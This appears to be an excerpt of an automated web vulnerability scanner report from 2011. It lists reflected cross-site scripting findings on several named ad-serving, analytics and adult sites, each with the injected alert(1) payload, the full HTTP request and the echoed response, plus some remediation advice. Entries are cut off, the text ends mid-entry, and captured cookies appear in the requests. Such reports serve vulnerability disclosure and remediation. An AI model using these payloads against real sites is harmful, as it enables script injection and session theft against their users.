HTTP/1.1 200 OK Date: Fri, 28 Jan 2011 16:59:58 GMT Server: Apache/2.0.52 (Red Hat) P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml" Content-Length: 807 Keep-Alive: timeout=60 Connection: Keep-Alive Content-Type: text/plain
<!-- Ad Tag: Dominion 728x90 --> <script type="text/javascript"> var _bizo_ad_partner_id = "847"; var _bizo_ad_section_id = "ATF"; var _bizo_ad_width = "728"; var _bizo_ad_height = "90"; var _b ...[SNIP]... 7realmedia.com/RealMedia/ads/adstream_lx.ads/www.soundingsonline.com/index.php/L33/1159960079/Top/Dom_Ent/Bizo-Sound-Bnr-728x90/Google-Sound-Bnr-728x90.html/7263485738303033424c73414270536c?_RM_EMPTY_&385a6"><script>alert(1)</script>9acac63b02a=1" WIDTH=2 HEIGHT=2>
The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 466bc"><script>alert(1)</script>0c124ef56d7 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /RealMedia/ads/adstream_sx.ads/bh.heraldinteractive.com466bc"><script>alert(1)</script>0c124ef56d7/video/1[randomNo]@x90]] HTTP/1.1 Host: oascentral.bostonherald.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=235728274.1296251844.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); OAX=rcHW801DO8kADVvc; __utma=235728274.1370509941.1296251844.1296251844.1296251844.1; __utmc=235728274; NSC_d12efm_qppm_iuuq=ffffffff09419e5f45525d5f4f58455e445a4a423660; __qca=P0-1247593866-1296251843767; __utmb=235728274.170.10.1296251844; RMFD=011PiwJwO101yed8|O2021J3t|O3021J48|P3021J4T|P2021J4m;
Response
HTTP/1.1 200 OK Date: Sat, 29 Jan 2011 05:09:08 GMT Server: Apache/2.0.52 (Red Hat) P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml" Content-Length: 369 Keep-Alive: timeout=60 Connection: Keep-Alive Content-Type: text/html
The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f667a"><script>alert(1)</script>b183b6c26c2 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /RealMedia/ads/adstream_sx.ads/bh.heraldinteractive.com/videof667a"><script>alert(1)</script>b183b6c26c2/1[randomNo]@x90]] HTTP/1.1 Host: oascentral.bostonherald.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=235728274.1296251844.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); OAX=rcHW801DO8kADVvc; __utma=235728274.1370509941.1296251844.1296251844.1296251844.1; __utmc=235728274; NSC_d12efm_qppm_iuuq=ffffffff09419e5f45525d5f4f58455e445a4a423660; __qca=P0-1247593866-1296251843767; __utmb=235728274.170.10.1296251844; RMFD=011PiwJwO101yed8|O2021J3t|O3021J48|P3021J4T|P2021J4m;
Response
HTTP/1.1 200 OK Date: Sat, 29 Jan 2011 05:09:10 GMT Server: Apache/2.0.52 (Red Hat) P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml" Content-Length: 369 Keep-Alive: timeout=60 Connection: Keep-Alive Content-Type: text/html
The value of REST URL parameter 6 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 99d8a"><script>alert(1)</script>56928d72bf6 was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /RealMedia/ads/adstream_sx.ads/bh.heraldinteractive.com/video/1[randomNo]@x90]]99d8a"><script>alert(1)</script>56928d72bf6 HTTP/1.1 Host: oascentral.bostonherald.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=235728274.1296251844.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); OAX=rcHW801DO8kADVvc; __utma=235728274.1370509941.1296251844.1296251844.1296251844.1; __utmc=235728274; NSC_d12efm_qppm_iuuq=ffffffff09419e5f45525d5f4f58455e445a4a423660; __qca=P0-1247593866-1296251843767; __utmb=235728274.170.10.1296251844; RMFD=011PiwJwO101yed8|O2021J3t|O3021J48|P3021J4T|P2021J4m;
Response
HTTP/1.1 200 OK Date: Sat, 29 Jan 2011 05:09:10 GMT Server: Apache/2.0.52 (Red Hat) P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml" Content-Length: 369 Keep-Alive: timeout=60 Connection: Keep-Alive Content-Type: text/html
The value of the ctype request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 6bfbb"%3balert(1)//0c99605c03e was submitted in the ctype parameter. This input was echoed as 6bfbb";alert(1)//0c99605c03e in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /fi/analytics/cms/?scode=wrgb&domain=events.cbs6albany.com&cname=zvents&ctype=section6bfbb"%3balert(1)//0c99605c03e&shier=entertainment&ghier=entertainment%7Cevents%7Cevents%7C HTTP/1.1 Host: onset.freedom.com Proxy-Connection: keep-alive Referer: http://events.cbs6albany.com/?376e5%22%3E%3Cscript%3Ealert(1)%3C/script%3Ea7771aeaee3=1 Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: s_vi=[CS]v1|26A040EC0514BA68-6000015720083FE6[CE]
Response
HTTP/1.1 200 OK Date: Sat, 29 Jan 2011 01:50:05 GMT Server: Apache Cache-Control: max-age=7200, must-revalidate Expires: Sat, 29 Jan 2011 03:50:05 GMT Vary: Accept-Encoding,User-Agent Content-Type: text/html Content-Length: 28740
var fiChildSAccount="fiwrgb";
var s_account="figlobal,"+fiChildSAccount; /* SiteCatalyst code version: H.9. Copyright 1997-2007 Omniture, Inc. More info available at http://www.omniture.com */ /***** ...[SNIP]... _c2f(c);return s(un,pg,ss)}
The value of the domain request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ab9fb"%3balert(1)//cd97779d75a was submitted in the domain parameter. This input was echoed as ab9fb";alert(1)//cd97779d75a in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /fi/analytics/cms/?scode=wrgb&domain=events.cbs6albany.comab9fb"%3balert(1)//cd97779d75a&cname=zvents&ctype=section&shier=entertainment&ghier=entertainment%7Cevents%7Cevents%7C HTTP/1.1 Host: onset.freedom.com Proxy-Connection: keep-alive Referer: http://events.cbs6albany.com/?376e5%22%3E%3Cscript%3Ealert(1)%3C/script%3Ea7771aeaee3=1 Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: s_vi=[CS]v1|26A040EC0514BA68-6000015720083FE6[CE]
Response
HTTP/1.1 200 OK Date: Sat, 29 Jan 2011 01:50:01 GMT Server: Apache Cache-Control: max-age=7200, must-revalidate Expires: Sat, 29 Jan 2011 03:50:01 GMT Vary: Accept-Encoding,User-Agent Content-Type: text/html Content-Length: 28923
var fiChildSAccount="fiwrgb";
var s_account="figlobal,"+fiChildSAccount; /* SiteCatalyst code version: H.9. Copyright 1997-2007 Omniture, Inc. More info available at http://www.omniture.com */ /***** ...[SNIP]... <0){eval(c);return new s_c(un,pg,ss)}else s=s_c2f(c);return s(un,pg,ss)}
s.pageName="events.cbs6albany.comab9fb";alert(1)//cd97779d75a: entertainment section front"; s.server="events.cbs6albany.comab9fb";alert(1)//cd97779d75a"; s.channel="entertainment"; s.pageType="";s.prop1=""; s.prop2="events.cbs6albany.comab9fb";alert(1)//cd97779 ...[SNIP]...
The value of the domain request parameter is copied into a JavaScript inline comment. The payload 9a661*/alert(1)//133025af296 was submitted in the domain parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /fi/analytics/cms/?scode=wrgb&domain=events.cbs6albany.com9a661*/alert(1)//133025af296&cname=zvents&ctype=section&shier=entertainment&ghier=entertainment%7Cevents%7Cevents%7C HTTP/1.1 Host: onset.freedom.com Proxy-Connection: keep-alive Referer: http://events.cbs6albany.com/?376e5%22%3E%3Cscript%3Ealert(1)%3C/script%3Ea7771aeaee3=1 Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: s_vi=[CS]v1|26A040EC0514BA68-6000015720083FE6[CE]
Response
HTTP/1.1 200 OK Date: Sat, 29 Jan 2011 01:50:02 GMT Server: Apache Cache-Control: max-age=7200, must-revalidate Expires: Sat, 29 Jan 2011 03:50:02 GMT Vary: Accept-Encoding,User-Agent Content-Type: text/html Content-Length: 28923
var fiChildSAccount="fiwrgb";
var s_account="figlobal,"+fiChildSAccount; /* SiteCatalyst code version: H.9. Copyright 1997-2007 Omniture, Inc. More info available at http://www.omniture.com */ /***** ...[SNIP]... + s.pageName; s.prop44="17:50"; s.eVar6=""; s.hier1="entertainment|root"; s.hier2="events.cbs6albany.com9a661*/alert(1)//133025af296|entertainment|events|events|root"; /** domain=events.cbs6albany.com9a661*/alert(1)//133025af296 **/
/** referer=http://events.cbs6albany.com/?376e5%22%3e%3cscript%3ealert(1)%3c/script%3ea7771aeaee3=1 **/ /************* DO NOT ALTER ANYTHING BELOW THIS LINE ! **************/ var s_code=s.t();if( ...[SNIP]...
The value of the publisher_redirecturl request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a0717"><script>alert(1)</script>37c84a60207 was submitted in the publisher_redirecturl parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
HTTP/1.0 200 OK Server: IM BidManager Date: Fri, 28 Jan 2011 16:59:36 GMT P3P: policyref="/w3c/p3p.xml", CP="OTI DSP COR ADMo TAIo PSAo PSDo CONo OUR SAMo OTRo STP UNI PUR COM NAV INT DEM STA PRE LOC" Expires: Fri, 28-Jan-2011 16:59:16 GMT Content-Type: text/html Pragma: no-cache Cache-Control: no-cache Content-Length: 264
4.716. http://pu.imlive.com/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://pu.imlive.com
Path:
/
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 46447"><script>alert(1)</script>ca3e148e25e was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /?46447"><script>alert(1)</script>ca3e148e25e=1 HTTP/1.1 Host: pu.imlive.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="pa-IN" lang="pa-IN" d ...[SNIP]... <a class="StaticLink" title="English" href="http://imlive.com/" onclick="dAccess('http://imlive.com/uaccess/0/||46447"><script>alert(1)</script>ca3e148e25e~1');return false;"> ...[SNIP]...
4.717. http://pu.imlive.com/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://pu.imlive.com
Path:
/
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload e39ce'-alert(1)-'10f765ebe49 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /?e39ce'-alert(1)-'10f765ebe49=1 HTTP/1.1 Host: pu.imlive.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="pa-IN" lang="pa-IN" d ...[SNIP]... <script type="text/javascript">try{var imgSrc='http://analytic.imlive.com/w.gif?c=121273&lr=1107815996&ud=0&pe=/homepage.aspx&he=pu.imlive.com&ul=/?e39ce'-alert(1)-'10f765ebe49=1&qs=e39ce'-alert(1)-'10f765ebe49=1&qs=e39ce'-alert(1)-'10f765ebe49=1&iy=dallas&id=44&iu=1&vd=918cb142-ac05-44ff-b781-bebd10f67a21';}catch(e){};function addEvent( obj, evt, fn ){if ( typeof obj.attach ...[SNIP]...
4.718. http://raw.oggifinogi.com/GetScript.aspx [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://raw.oggifinogi.com
Path:
/GetScript.aspx
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload e463c'%3balert(1)//756d2af6207 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as e463c';alert(1)//756d2af6207 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /GetScript.aspx?oggiId=8a1e14f9-0430-4899-bc31-63608f1bee92&oggiWidth=728px&oggiHeight=90px&oggiCampaignId=d12ec800-d902-472d-9d0d-8a77a14a4187&oggiVary=&oggiImpolite=true&oggiClickTrack=http://media.fastclick.net/w/click.here?cid=279384&mid=521626&m=1&sid=54393&c=0&tp=5&forced_click=&oggiIsIframe=1&oggiSite=http%3A//www.bostonherald.com/track/&e463c'%3balert(1)//756d2af6207=1 HTTP/1.1 Host: raw.oggifinogi.com Proxy-Connection: keep-alive Referer: http://www.bostonherald.com/includes/processAds.bg?position=Bottom&companion=Top,Middle,Middle1,Bottom&page=bh.heraldinteractive.com%2Ftrack%2Fhome Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
The value of the oggiHeight request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 76eda"%3balert(1)//b92a78ddf85 was submitted in the oggiHeight parameter. This input was echoed as 76eda";alert(1)//b92a78ddf85 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /GetScript.aspx?oggiId=92893396-e0b6-4c83-8a05-c0a43993b46b&oggiWidth=300px&oggiHeight=250px76eda"%3balert(1)//b92a78ddf85&oggiCampaignId=07b24386-4c5b-4ca7-8b27-6adc092e2aef&oggiVary=&oggiImpolite=true&oggiClickTrack=http://ad.doubleclick.net/click%3Bh%3Dv8/3a9d/3/0/%2a/k%3B232873271%3B0-0%3B1%3B44779888%3B4307-300/250%3B39460925/39478712/1%3Bu%3D%2Ccm-61525102_1296251877%2C11d765b6a10b1b3%2Cpolit%2Ccm.cm_aa_gn1-cm.sportsreg-cm.sportsfan-cm.de16_1-cm.de18_1-cm.sports_h-cm.weath_l-bk.rdst1-ex.32-ex.76-qc.a%3B%7Eokv%3D%3Bnet%3Dcm%3Bu%3D%2Ccm-61525102_1296251877%2C11d765b6a10b1b3%2Cpolit%2Ccm.cm_aa_gn1-cm.sportsreg-cm.sportsfan-cm.de16_1-cm.de18_1-cm.sports_h-cm.weath_l-bk.rdst1-ex.32-ex.76-qc.a%3B%3Bcmw%3Dowl%3Bsz%3D300x250%3Bnet%3Dcm%3Bord1%3D853654%3Bcontx%3Dpolit%3Ban%3D20%3Bdc%3Dw%3Bbtg%3Dcm.cm_aa_gn1%3Bbtg%3Dcm.sportsreg%3Bbtg%3Dcm.sportsfan%3Bbtg%3Dcm.de16_1%3Bbtg%3Dcm.de18_1%3Bbtg%3Dcm.sports_h%3Bbtg%3Dcm.weath_l%3Bbtg%3Dbk.rdst1%3Bbtg%3Dex.32%3Bbtg%3Dex.76%3Bbtg%3Dqc.a%3B%7Eaopt%3D3/0/ee/0%3B%7Esscs%3D%3f&oggiSite=http%3A//www.bostonherald.com/news/regional/view/20110128feds_fake_cop_cammed_dates_alleged_thief_scored_women_as_us_marshal_on_craigslist/srvc%3Dhome%26position%3D4 HTTP/1.1 Host: raw.oggifinogi.com Proxy-Connection: keep-alive Referer: http://www.bostonherald.com/news/regional/view/20110128feds_fake_cop_cammed_dates_alleged_thief_scored_women_as_us_marshal_on_craigslist/srvc=home&position=4 Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
The value of the oggiHeight request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 54460'%3balert(1)//d2008572656 was submitted in the oggiHeight parameter. This input was echoed as 54460';alert(1)//d2008572656 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /GetScript.aspx?oggiId=92893396-e0b6-4c83-8a05-c0a43993b46b&oggiWidth=300px&oggiHeight=250px54460'%3balert(1)//d2008572656&oggiCampaignId=07b24386-4c5b-4ca7-8b27-6adc092e2aef&oggiVary=&oggiImpolite=true&oggiClickTrack=http://ad.doubleclick.net/click%3Bh%3Dv8/3a9d/3/0/%2a/k%3B232873271%3B0-0%3B1%3B44779888%3B4307-300/250%3B39460925/39478712/1%3Bu%3D%2Ccm-61525102_1296251877%2C11d765b6a10b1b3%2Cpolit%2Ccm.cm_aa_gn1-cm.sportsreg-cm.sportsfan-cm.de16_1-cm.de18_1-cm.sports_h-cm.weath_l-bk.rdst1-ex.32-ex.76-qc.a%3B%7Eokv%3D%3Bnet%3Dcm%3Bu%3D%2Ccm-61525102_1296251877%2C11d765b6a10b1b3%2Cpolit%2Ccm.cm_aa_gn1-cm.sportsreg-cm.sportsfan-cm.de16_1-cm.de18_1-cm.sports_h-cm.weath_l-bk.rdst1-ex.32-ex.76-qc.a%3B%3Bcmw%3Dowl%3Bsz%3D300x250%3Bnet%3Dcm%3Bord1%3D853654%3Bcontx%3Dpolit%3Ban%3D20%3Bdc%3Dw%3Bbtg%3Dcm.cm_aa_gn1%3Bbtg%3Dcm.sportsreg%3Bbtg%3Dcm.sportsfan%3Bbtg%3Dcm.de16_1%3Bbtg%3Dcm.de18_1%3Bbtg%3Dcm.sports_h%3Bbtg%3Dcm.weath_l%3Bbtg%3Dbk.rdst1%3Bbtg%3Dex.32%3Bbtg%3Dex.76%3Bbtg%3Dqc.a%3B%7Eaopt%3D3/0/ee/0%3B%7Esscs%3D%3f&oggiSite=http%3A//www.bostonherald.com/news/regional/view/20110128feds_fake_cop_cammed_dates_alleged_thief_scored_women_as_us_marshal_on_craigslist/srvc%3Dhome%26position%3D4 HTTP/1.1 Host: raw.oggifinogi.com Proxy-Connection: keep-alive Referer: http://www.bostonherald.com/news/regional/view/20110128feds_fake_cop_cammed_dates_alleged_thief_scored_women_as_us_marshal_on_craigslist/srvc=home&position=4 Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
The value of the oggiImpolite request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 6405c'%3balert(1)//18d1dd4323b was submitted in the oggiImpolite parameter. This input was echoed as 6405c';alert(1)//18d1dd4323b in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /GetScript.aspx?oggiId=92893396-e0b6-4c83-8a05-c0a43993b46b&oggiWidth=300px&oggiHeight=250px&oggiCampaignId=07b24386-4c5b-4ca7-8b27-6adc092e2aef&oggiVary=&oggiImpolite=true6405c'%3balert(1)//18d1dd4323b&oggiClickTrack=http://ad.doubleclick.net/click%3Bh%3Dv8/3a9d/3/0/%2a/k%3B232873271%3B0-0%3B1%3B44779888%3B4307-300/250%3B39460925/39478712/1%3Bu%3D%2Ccm-61525102_1296251877%2C11d765b6a10b1b3%2Cpolit%2Ccm.cm_aa_gn1-cm.sportsreg-cm.sportsfan-cm.de16_1-cm.de18_1-cm.sports_h-cm.weath_l-bk.rdst1-ex.32-ex.76-qc.a%3B%7Eokv%3D%3Bnet%3Dcm%3Bu%3D%2Ccm-61525102_1296251877%2C11d765b6a10b1b3%2Cpolit%2Ccm.cm_aa_gn1-cm.sportsreg-cm.sportsfan-cm.de16_1-cm.de18_1-cm.sports_h-cm.weath_l-bk.rdst1-ex.32-ex.76-qc.a%3B%3Bcmw%3Dowl%3Bsz%3D300x250%3Bnet%3Dcm%3Bord1%3D853654%3Bcontx%3Dpolit%3Ban%3D20%3Bdc%3Dw%3Bbtg%3Dcm.cm_aa_gn1%3Bbtg%3Dcm.sportsreg%3Bbtg%3Dcm.sportsfan%3Bbtg%3Dcm.de16_1%3Bbtg%3Dcm.de18_1%3Bbtg%3Dcm.sports_h%3Bbtg%3Dcm.weath_l%3Bbtg%3Dbk.rdst1%3Bbtg%3Dex.32%3Bbtg%3Dex.76%3Bbtg%3Dqc.a%3B%7Eaopt%3D3/0/ee/0%3B%7Esscs%3D%3f&oggiSite=http%3A//www.bostonherald.com/news/regional/view/20110128feds_fake_cop_cammed_dates_alleged_thief_scored_women_as_us_marshal_on_craigslist/srvc%3Dhome%26position%3D4 HTTP/1.1 Host: raw.oggifinogi.com Proxy-Connection: keep-alive Referer: http://www.bostonherald.com/news/regional/view/20110128feds_fake_cop_cammed_dates_alleged_thief_scored_women_as_us_marshal_on_craigslist/srvc=home&position=4 Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
The value of the oggiSite request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload a4322'%3balert(1)//880bad4c955 was submitted in the oggiSite parameter. This input was echoed as a4322';alert(1)//880bad4c955 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /GetScript.aspx?oggiId=8a1e14f9-0430-4899-bc31-63608f1bee92&oggiWidth=728px&oggiHeight=90px&oggiCampaignId=d12ec800-d902-472d-9d0d-8a77a14a4187&oggiVary=&oggiImpolite=true&oggiClickTrack=http://media.fastclick.net/w/click.here?cid=279384&mid=521626&m=1&sid=54393&c=0&tp=5&forced_click=&oggiIsIframe=1&oggiSite=http%3A//www.bostonherald.com/track/a4322'%3balert(1)//880bad4c955 HTTP/1.1 Host: raw.oggifinogi.com Proxy-Connection: keep-alive Referer: http://www.bostonherald.com/includes/processAds.bg?position=Bottom&companion=Top,Middle,Middle1,Bottom&page=bh.heraldinteractive.com%2Ftrack%2Fhome Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
The value of the oggiVary request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 7a182"%3balert(1)//e1b39971356 was submitted in the oggiVary parameter. This input was echoed as 7a182";alert(1)//e1b39971356 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /GetScript.aspx?oggiId=92893396-e0b6-4c83-8a05-c0a43993b46b&oggiWidth=300px&oggiHeight=250px&oggiCampaignId=07b24386-4c5b-4ca7-8b27-6adc092e2aef&oggiVary=7a182"%3balert(1)//e1b39971356&oggiImpolite=true&oggiClickTrack=http://ad.doubleclick.net/click%3Bh%3Dv8/3a9d/3/0/%2a/k%3B232873271%3B0-0%3B1%3B44779888%3B4307-300/250%3B39460925/39478712/1%3Bu%3D%2Ccm-61525102_1296251877%2C11d765b6a10b1b3%2Cpolit%2Ccm.cm_aa_gn1-cm.sportsreg-cm.sportsfan-cm.de16_1-cm.de18_1-cm.sports_h-cm.weath_l-bk.rdst1-ex.32-ex.76-qc.a%3B%7Eokv%3D%3Bnet%3Dcm%3Bu%3D%2Ccm-61525102_1296251877%2C11d765b6a10b1b3%2Cpolit%2Ccm.cm_aa_gn1-cm.sportsreg-cm.sportsfan-cm.de16_1-cm.de18_1-cm.sports_h-cm.weath_l-bk.rdst1-ex.32-ex.76-qc.a%3B%3Bcmw%3Dowl%3Bsz%3D300x250%3Bnet%3Dcm%3Bord1%3D853654%3Bcontx%3Dpolit%3Ban%3D20%3Bdc%3Dw%3Bbtg%3Dcm.cm_aa_gn1%3Bbtg%3Dcm.sportsreg%3Bbtg%3Dcm.sportsfan%3Bbtg%3Dcm.de16_1%3Bbtg%3Dcm.de18_1%3Bbtg%3Dcm.sports_h%3Bbtg%3Dcm.weath_l%3Bbtg%3Dbk.rdst1%3Bbtg%3Dex.32%3Bbtg%3Dex.76%3Bbtg%3Dqc.a%3B%7Eaopt%3D3/0/ee/0%3B%7Esscs%3D%3f&oggiSite=http%3A//www.bostonherald.com/news/regional/view/20110128feds_fake_cop_cammed_dates_alleged_thief_scored_women_as_us_marshal_on_craigslist/srvc%3Dhome%26position%3D4 HTTP/1.1 Host: raw.oggifinogi.com Proxy-Connection: keep-alive Referer: http://www.bostonherald.com/news/regional/view/20110128feds_fake_cop_cammed_dates_alleged_thief_scored_women_as_us_marshal_on_craigslist/srvc=home&position=4 Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
The value of the oggiVary request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 9e4ea'%3balert(1)//c6fa5b63d0 was submitted in the oggiVary parameter. This input was echoed as 9e4ea';alert(1)//c6fa5b63d0 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
